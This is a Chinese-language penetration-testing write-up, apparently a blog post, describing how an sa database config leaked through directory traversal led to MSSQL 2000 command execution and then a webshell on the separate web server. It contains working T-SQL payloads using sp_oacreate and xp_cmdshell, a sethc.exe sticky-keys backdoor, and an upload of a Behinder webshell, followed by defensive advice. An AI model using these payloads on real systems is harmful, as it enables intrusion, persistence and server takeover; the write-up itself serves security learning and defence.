实战：站库分离环境下获取WebShell的完整过程<\/h1>

1. 信息收集与泄露发现<\/h2>

目录扫描发现漏洞<\/strong><\/p>

通过目录扫描工具发现目标网站存在目录遍历漏洞<\/strong><\/li>
在遍历的目录中发现了app<\/code>目录的备份文件<\/li>
备份文件中包含数据库配置文件<\/li> <\/ul> <\/li>
关键信息获取<\/strong><\/p> 数据库使用sa账户<\/strong>连接（最高权限）<\/li> 发现主站无CDN保护<\/li> 主站IP与数据库配置文件中的IP不一致，确认是站库分离架构<\/strong><\/li> <\/ul> <\/li> <\/ol> 2. MSSQL数据库渗透<\/h2> 2.1 使用Xp_cmdshell执行命令<\/h3> 连接数据库<\/strong><\/p> 使用sqlmap直接连接数据库： sqlmap -d "db_type:\/\/user:pwd@ip:port\/db" command <\/code><\/pre> <\/li> 确认数据库版本为SQL Server 2000<\/strong><\/li> <\/ul> <\/li> 手动连接尝试<\/strong><\/p> 由于Navicat不支持MSSQL 2000，改用Database4连接<\/li> MSSQL 2000默认开启Xp_cmdshell，可直接调用<\/li> 执行命令失败，可能原因：数据库账户权限不足，无法创建Cmd进程<\/li> <\/ul> <\/li> <\/ol> 2.2 使用Sp_oacreate执行命令<\/h3> Sp_oacreate特点<\/strong><\/p> 无命令执行回显<\/li> 可将命令输出写入文件再读取<\/li> <\/ul> <\/li> 两种执行方式尝试<\/strong><\/p> -- 方式1 <\/span><\/span><\/span><\/span>declare<\/span> @<\/span>o int <\/span><\/span>exec<\/span> sp_oacreate 'Shell.Application'<\/span>, @<\/span>o out<\/span> <\/span><\/span>exec<\/span> sp_oamethod @<\/span>o, 'ShellExecute'<\/span>,null<\/span>, 'cmd.exe'<\/span>,'cmd \/c whoami >e:\test.txt'<\/span>,'c:\windows\system32'<\/span>,''<\/span>,'1'<\/span>; <\/span><\/span> <\/span><\/span>-- 方式2 <\/span><\/span><\/span><\/span>declare<\/span> @<\/span>shell int <\/span><\/span>exec<\/span> sp_oacreate 'wscript.shell'<\/span>,@<\/span>shell output<\/span> <\/span><\/span>exec<\/span> sp_oamethod @<\/span>shell,'run'<\/span>,null<\/span>,'c:\windows\system32\cmd.exe \/c whoami > c:\\1.txt'<\/span> <\/span><\/span><\/code><\/pre> 两种方式都导致Database4卡死，执行失败<\/li> <\/ul> <\/li> <\/ol> 2.3 使用Sp_oacreate创建Shift后门<\/h3> -- 复制explorer.exe替换sethc.exe <\/span><\/span><\/span><\/span>declare<\/span> @<\/span>o int <\/span><\/span>exec<\/span> sp_oacreate 'scripting.filesystemobject'<\/span>, @<\/span>o out<\/span> <\/span><\/span>exec<\/span> sp_oamethod @<\/span>o, 'copyfile'<\/span>,null<\/span>,'c:\windows\explorer.exe'<\/span> ,'c:\windows\system32\sethc.exe'<\/span>; <\/span><\/span> <\/span><\/span>-- 复制到dllcache目录 <\/span><\/span><\/span><\/span>declare<\/span> @<\/span>o int <\/span><\/span>exec<\/span> sp_oacreate 'scripting.filesystemobject'<\/span>, @<\/span>o out<\/span> <\/span><\/span>exec<\/span> sp_oamethod @<\/span>o, 'copyfile'<\/span>,null<\/span>,'c:\windows\system32\sethc.exe'<\/span> ,'c:\windows\system32\dllcache\sethc.exe'<\/span>; <\/span><\/span><\/code><\/pre> 命令执行成功但无法触发后门，原因未知<\/li> <\/ul> 2.4 使用Sp_oacreate读写文件<\/h3> 创建和写入文件<\/strong><\/p> declare<\/span> @<\/span>o int, @<\/span>f int, @<\/span>t int, @<\/span>ret int <\/span><\/span>exec<\/span> sp_oacreate 'scripting.filesystemobject'<\/span>, @<\/span>o out<\/span> <\/span><\/span>exec<\/span> sp_oamethod @<\/span>o, 'createtextfile'<\/span>, @<\/span>f out<\/span>, 'e:\tmp1.txt'<\/span>, 1<\/span> <\/span><\/span>exec<\/span> @<\/span>ret =<\/span> sp_oamethod @<\/span>f, 'writeline'<\/span>, NULL<\/span>,'tes1t'<\/span> <\/span><\/span><\/code><\/pre><\/li> 查看目录结构<\/strong><\/p> execute<\/span> master..xp_dirtree 'e:\'<\/span>,1<\/span>,1<\/span> <\/span><\/span><\/code><\/pre><\/li> 查看文件内容<\/strong><\/p> 注意：表名不能重复，每次查询需更换表名<\/li> <\/ul> <\/li> <\/ol> 3. 代码审计与WebShell获取<\/h2> 发现上传漏洞<\/strong><\/p> 审计源码发现未防护的文件上传功能<\/li> 上传文件会直接传送到http:\/\/主站IP:8082\/upload<\/code>下<\/li> <\/ul> <\/li> 上传测试<\/strong><\/p> 构造HTML上传页面，提交到app<\/code>目录下的upload.php<\/code><\/li> 先上传正常图片测试功能<\/li> <\/ul> <\/li> 路径问题<\/strong><\/p> 提供的路径错误，实际路径在主站下的app<\/code>目录<\/li> <\/ul> <\/li> 上传WebShell<\/strong><\/p> 初次上传一句话木马被杀<\/li> 测试上传phpinfo()<\/code>可执行<\/li> 最终上传冰蝎马成功获取WebShell<\/li> <\/ul> <\/li> <\/ol> 关键点总结<\/h2> 信息收集至关重要<\/strong>：目录遍历漏洞导致数据库配置泄露<\/li> 站库分离环境特点<\/strong>：主站和数据库不在同一服务器<\/li> SQL Server 2000特性<\/strong>：默认开启Xp_cmdshell<\/li> 权限问题<\/strong>：即使有sa权限也可能受系统权限限制<\/li> 多种执行命令方式<\/strong>：Xp_cmdshell、Sp_oacreate等<\/li> 上传漏洞利用<\/strong>：代码审计发现未防护的上传点<\/li> 绕过防护<\/strong>：从简单测试(phpinfo)到复杂马(冰蝎)的渐进过程<\/li> <\/ol> 防御建议<\/h2> 禁用目录遍历功能<\/li> 不要在生产环境使用sa账户<\/li> 定期清理备份文件<\/li> 对上传功能进行严格过滤<\/li> 最小化数据库账户权限<\/li> 禁用不必要的存储过程(Xp_cmdshell等)<\/li> 站库分离环境下加强数据库服务器防护<\/li> <\/ol>